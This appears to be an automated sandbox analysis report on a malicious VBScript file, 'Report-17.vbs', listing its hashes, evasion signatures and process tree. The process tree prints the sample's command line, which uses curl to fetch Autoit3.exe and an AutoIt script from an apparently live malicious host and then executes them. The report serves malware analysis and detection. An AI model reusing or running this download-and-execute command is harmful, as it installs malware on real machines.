Analysis
max time kernel: 142s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20230915-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
submitted: 10/10/2023, 15:46
Static task: static1
Behavioral task behavioral1: sample Report-17.txt, resource win7-20230831-en
Behavioral task behavioral2: sample Report-17.txt, resource win10v2004-20230915-en
Behavioral task behavioral3: sample Report-17.vbs, resource win7-20230831-en
Behavioral task behavioral4: sample Report-17.vbs, resource win10v2004-20230915-en
General
Target: Report-17.vbs
Size: 16KB
MD5: 902d4e9234583e12da2d0078d37f5a30
SHA1: 7ced5e82455bc1afc788ebf13170f76a219edea2
SHA256: 5c084328ab45eb579d31c3157b0f486cbfea6ca0dfd89dda2084ace5745b9549
SHA512: 8a0e61e9d3110de4aa10c63b60dd0ace4b3725915c3e20d225986f94c30bd4fe181e94bb21d2771c458b256bdea2028a24f4d6e56c012d46da6032175810c1da
SSDEEP: 384:SzE0ig4KR/aQsKsWMnkf+cTPgKekvj27vmJYs:AJHsXkfNEKekvq7eJz
Malware Config
Signatures
Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  4     3716  WScript.exe
  7     3716  WScript.exe
  9     3716  WScript.exe

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                            Process
  Key value queried  \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation  WScript.exe

Executes dropped EXE (1 IoC)
  pid   Process
  1568  Autoit3.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                                   Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      Autoit3.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  Autoit3.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description                     pid  Process
  Token: SeManageVolumePrivilege  420  svchost.exe

Suspicious use of WriteProcessMemory (9 IoCs)
  description                       pid   Process      procid_target
  PID 3716 wrote to memory of 3496  3716  WScript.exe  83
  PID 3716 wrote to memory of 3496  3716  WScript.exe  83
  PID 3496 wrote to memory of 3808  3496  cmd.exe      85
  PID 3496 wrote to memory of 3808  3496  cmd.exe      85
  PID 3496 wrote to memory of 4352  3496  cmd.exe      88
  PID 3496 wrote to memory of 4352  3496  cmd.exe      88
  PID 3496 wrote to memory of 1568  3496  cmd.exe      89
  PID 3496 wrote to memory of 1568  3496  cmd.exe      89
  PID 3496 wrote to memory of 1568  3496  cmd.exe      89
Processes
WScript.exe (PID 3716)
  Image: C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Report-17.vbs"
  Signatures: Blocklisted process makes network request; Checks computer location settings; Suspicious use of WriteProcessMemory

  cmd.exe (PID 3496)
    Image: C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c cd /d %temp% & curl -o Autoit3.exe http://prestige-castom.com:2351 & curl -o ymehvz.au3 http://prestige-castom.com:2351/msirzgnzamg & Autoit3.exe ymehvz.au3
    Signatures: Suspicious use of WriteProcessMemory

    curl.exe (PID 3808)
      Image: C:\Windows\system32\curl.exe
      Command line: curl -o Autoit3.exe http://prestige-castom.com:2351

    curl.exe (PID 4352)
      Image: C:\Windows\system32\curl.exe
      Command line: curl -o ymehvz.au3 http://prestige-castom.com:2351/msirzgnzamg

    Autoit3.exe (PID 1568)
      Image: C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
      Command line: Autoit3.exe ymehvz.au3
      Signatures: Executes dropped EXE; Checks processor information in registry

rundll32.exe (PID 3680)
  Image: C:\Windows\system32\rundll32.exe
  Command line: "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

svchost.exe (PID 420)
  Image: C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k UnistackSvcGroup
  Signatures: Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 872KB
MD5: c56b5f0201a3b3de53e561fe76912bfd
SHA1: 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512: 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Filesize: 102KB
MD5: 151711041ee1619088258f05a5d3bd5b
SHA1: d2047aaf530ce0db076ea7cc7e548fd5a35cee55
SHA256: ead5d943a69f2d8641612415c77ad26daa6d53e1c6ea0270a91d3121eafd943d
SHA512: 1085c381dc8f97353bed29e96a10a2e8ba4a6df761c2af56f9cced5cc6b49c80c388e280a2d53b09e20b4e19f1bdcc813d687d52f7f31679f6ee1c84c23037a1

Filesize: 388KB
MD5: 1ddcfa52d781f75190c18c48e9645b63
SHA1: e2976a957580fde87caa6dd615e01a574292b564
SHA256: 1f77719d1f2ffee980d89e74904859e7d098ac1f7d1d09a0e406b1a4a1f8e23c
SHA512: 7882772319b3a801b72ebfad7674c35f43261f9f7aa0b163e49da0d898090ca1380db5b209b6263889a1180c68bd75ac6d53fb0fbaeebfca96f167f51a607afb